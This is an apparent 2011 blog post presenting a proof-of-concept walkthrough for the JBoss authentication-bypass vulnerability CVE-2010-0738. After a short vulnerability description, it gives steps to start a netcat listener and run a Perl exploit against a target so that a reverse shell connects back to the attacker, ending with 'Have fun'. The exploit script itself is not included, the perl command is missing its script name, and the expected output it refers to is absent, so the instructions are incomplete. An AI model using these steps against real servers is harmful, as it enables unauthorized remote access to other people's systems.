Saturday, 12 March 2011

Proof of concept for the JBoss exploit (CVE-2010-0738)

CVE: CVE-2010-0738
Remote: Yes
Local: No
URL about the vuln and download of the exploit:

JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions and obtain sensitive information or gain unauthorized access to the application.
Ok, now let's rock and roll!
1) Open 2 shells on your BackTrack or your pentest machine.
2) In the first one, prepare your pentest server to receive the connection back from the target machine by typing this in the shell: nc -l -p 8000 -vvv
3) Now, in the other shell, run the exploit: perl 8080 8000 lnx

If you see this in the exploit shell, it means it worked!


Now go to your other shell and you should have your reverse shell connected!

Have fun.
